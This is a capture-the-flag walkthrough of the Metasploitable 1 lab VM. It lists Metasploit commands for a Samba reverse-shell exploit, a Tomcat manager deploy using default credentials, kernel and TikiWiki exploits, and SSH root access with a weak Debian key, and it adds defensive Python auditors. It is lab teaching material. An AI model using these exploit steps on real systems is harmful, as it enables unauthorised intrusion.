Capture the flag (CTF)

Metasploitable: 1 - walkthrough

May 17, 2017 by Chiragh Dewan

Metasploitable: 1 surfaced on VulnHub on May 19th, 2010. Created by Metasploit, it can be found at https://www.vulnhub.com/entry/metasploitable-1,28/. It is the first machine in the Metasploitable series. The objective is to get root privileges.


For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the victim machine will look like:

We start by finding the IP address of the victim machine with the netdiscover command:

$ netdiscover

Now that we know our target IP, let's scan its ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 21 - Running FTP
  • Port 22 - Running OpenSSH
  • Port 23 - Running Telnet
  • Port 25 - Running SMTP
  • Port 80 - Running Apache Web server
  • Port 139 - Running Samba
  • Port 445 - Running Samba
  • Port 3306 - Running MySQL
  • Port 5432 - Running PostgreSQL
  • Port 8009 - Running Apache Jserv
  • Port 8180 - Running Apache Tomcat

Upon visiting the web application (on port 80 via http://) we just see a default Test Page:

Looking at the page source does not reveal anything to us either.

Looking back at the scan results, one particular port catches my eye: port 445, running Samba 3.0.20. Doing some basic research, I found a vulnerability (CVE-2007-2447): http://www.cvedetails.com/cve/cve-2007-2447. Let's fire up Metasploit and see if that works:

$ use exploit/multi/samba/usermap_script

$ set PAYLOAD cmd/unix/reverse_netcat

And we are root!

Since this took no time at all, I decided to see how many more ways I could find to exploit this machine.

The next thing that caught my eye while looking back at the scan was port 8180, running Tomcat. Checking it in the browser, this is what I found:

While doing some light reading, I came across the following link, https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy, and thought of giving it a try:

$ use exploit/multi/http/tomcat_mgr_deploy

$ use payload/java/meterpreter/reverse_tcp

$ set httpusername tomcat

$ set httppassword tomcat

$ set target 0

$ set RPORT 8180

We did get a low privilege shell. Let's see how we can escalate our privilege!

While looking around, I saw that the kernel is vulnerable to the following exploit: https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

Let's give it a shot:

$ use exploit/linux/local/udev_netlink

And we get root!

Note: Since the default credentials are tomcat:tomcat, you can log in at http://172.16.92.139:8180/admin and play around a bit as well.
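The defender's view of the Tomcat step above is simple: the manager application only deployed our payload because the shipped tomcat:tomcat account still existed with a privileged role. Below is an added example (my own code, not part of the original walkthrough or of Tomcat itself) that audits a tomcat-users.xml for accounts whose password is empty, equal to the username, or a known default, and reports which privileged roles those accounts hold. The sample file is constructed for the demo; only the "tomcat" default password is taken from the walkthrough.

```python
"""Audit a tomcat-users.xml for default or weak credentials on privileged roles.

Added example (not from the walkthrough or the Metasploitable project): the file
below is constructed, not copied from the target VM.
"""
import xml.etree.ElementTree as ET

# Passwords that should never appear in a deployed tomcat-users.xml. Only
# "tomcat" comes from the walkthrough; treat the set as a starting point.
KNOWN_DEFAULT_PASSWORDS = {"tomcat"}

# Role names (Tomcat 5.5 "manager"/"admin" and the later "manager-*"/"admin-*"
# split) that grant deployment or administrative access.
PRIVILEGED_ROLE_MARKERS = ("manager", "admin")

# Constructed sample: one account with the shipped default, one hardened account.
SAMPLE_TOMCAT_USERS = """
<tomcat-users>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="admin,manager"/>
  <user username="deploy" password="Lx9!vQ2#pR7mZ4wT" roles="manager-script"/>
</tomcat-users>
"""


def _local_name(tag: str) -> str:
    """Strip an XML namespace ('{uri}user' -> 'user'); Tomcat 7+ files declare one."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> list[dict]:
    """Return one finding per <user> whose password is empty, equal to the
    username, or a known default. Each finding lists the privileged roles the
    account holds so the reviewer can see the blast radius."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local_name(el.tag) != "user":
            continue
        # Tomcat accepts either "username" or "name" for the account name.
        username = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = [r.strip() for r in (el.get("roles") or "").split(",") if r.strip()]

        problems = []
        if not password:
            problems.append("empty password")
        elif password.lower() == username.lower():
            problems.append("password equals username")
        if password.lower() in KNOWN_DEFAULT_PASSWORDS:
            problems.append("known default password")
        if not problems:
            continue

        privileged = [r for r in roles
                      if any(m in r.lower() for m in PRIVILEGED_ROLE_MARKERS)]
        findings.append({"username": username,
                         "privileged_roles": privileged,
                         "problems": problems})
    return findings


def flagged_usernames(xml_text: str = SAMPLE_TOMCAT_USERS) -> list[str]:
    """Convenience wrapper: just the account names that need attention."""
    return [f["username"] for f in audit_tomcat_users(xml_text)]


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

Running it against the sample flags only the tomcat account (password equals username, known default, holds admin and manager). The namespace handling matters on newer Tomcat versions, where the root element declares xmlns="http://tomcat.apache.org/xml" and a naive tag comparison would silently skip every user.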

Next, I thought of playing around with PostgreSQL. I tried to run a scan, and it came up with a username and password:

$ use auxiliary/scanner/postgres/postgres_login

Moving on, I wanted to do something with the web app. So I brought out my old friend, DirBuster, to reveal its secrets:

TWiki looks interesting. Going to the browser it shows:

Let's see if Metasploit has anything on it:

Let's start with this:

We are getting somewhere. Now let's try a remote PHP code execution exploit we saw earlier:

$ use exploit/unix/webapp/tikiwiki_graph_formula_exec

We do get a limited shell. However, it took a few attempts before the shell was spawned.

Checking its root directory shows us:

Let's see what ssh has:

Let's ssh with these credentials:

Note: You'll need to download the following keys in order to search: https://hdm.io/tools/debian-openssl/ (2048 bit RSA)

In the folder, let's search for a key:

$ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

And now, time to get in!!

$ ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@172.16.92.139


And we are root!
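The grep against the precomputed key set is the attacker's side of the Debian OpenSSL weak-key problem; the defender's side is to fingerprint every key in authorized_keys and look it up in a blacklist, which is what the tooling Debian shipped at the time did. Below is an added example of that check (my own code, not from the walkthrough or from Debian's tools). The key blobs, the authorized_keys text and the blacklist are all constructed for the demo; Debian's blacklist files were keyed on a truncated MD5 fingerprint, while the full digest is used here, so adjust md5_fingerprint to match whatever list you actually load.

```python
"""Check an authorized_keys file against a blacklist of known-weak key fingerprints.

Added example, not code from the walkthrough. Every public key blob is
fingerprinted and looked up in a blacklist. The key blobs, blacklist and
authorized_keys text below are all constructed for the demo.
"""
import base64
import binascii
import hashlib
from dataclasses import dataclass

KEY_TYPES = (
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
)

# Constructed blobs (base64 of short strings) standing in for real key material.
WEAK_BLOB = "Y29uc3RydWN0ZWQtd2Vhay1rZXk="   # "constructed-weak-key"
GOOD_BLOB = "Y29uc3RydWN0ZWQtZ29vZC1rZXk="   # "constructed-good-key"

SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample authorized_keys
ssh-rsa {WEAK_BLOB} root@metasploitable
command="/bin/false" ssh-rsa {GOOD_BLOB} backup@host
ssh-rsa not*base64 broken@host
"""


@dataclass
class KeyCheck:
    line_no: int
    key_type: str
    comment: str
    fingerprint: str        # MD5 hex of the decoded blob, "" if it could not be decoded
    weak: bool
    error: str = ""


def md5_fingerprint(blob_b64: str) -> str:
    """MD5 hex fingerprint of a base64 public-key blob.
    Raises binascii.Error on bad base64 (non-alphabet characters or padding)."""
    raw = base64.b64decode(blob_b64, validate=True)
    return hashlib.md5(raw).hexdigest()


# Constructed blacklist: in practice this set is loaded from a published list.
WEAK_FINGERPRINTS = {md5_fingerprint(WEAK_BLOB)}


def audit_authorized_keys(text: str, blacklist: set) -> list[KeyCheck]:
    """Parse each authorized_keys entry (optional options, key type, blob,
    comment) and flag blobs whose fingerprint is blacklisted."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        tokens = stripped.split()
        # Options such as command="..." may precede the key type; locate it by name.
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            results.append(KeyCheck(n, "", "", "", False, "unrecognised key line"))
            continue
        key_type, blob = tokens[idx], tokens[idx + 1]
        comment = " ".join(tokens[idx + 2:])
        try:
            fp = md5_fingerprint(blob)
        except binascii.Error as exc:
            results.append(KeyCheck(n, key_type, comment, "", False, f"bad base64: {exc}"))
            continue
        results.append(KeyCheck(n, key_type, comment, fp, fp in blacklist))
    return results


def weak_key_comments(text: str = SAMPLE_AUTHORIZED_KEYS,
                      blacklist: set = WEAK_FINGERPRINTS) -> list[str]:
    """Comments (usually user@host) of the entries that must be revoked."""
    return [c.comment for c in audit_authorized_keys(text, blacklist) if c.weak]


if __name__ == "__main__":
    for check in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS):
        print(check)
```

On the sample input only the root@metasploitable entry is reported as weak; the entry with a command= option is parsed correctly because the key type is located by name rather than by position, and the undecodable blob is reported as an error instead of aborting the whole audit. A line the script cannot parse is itself worth a look, since a malformed entry in root's authorized_keys is either a typo or something someone hid there.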

Chiragh Dewan

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc. for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security, including at a TEDx event.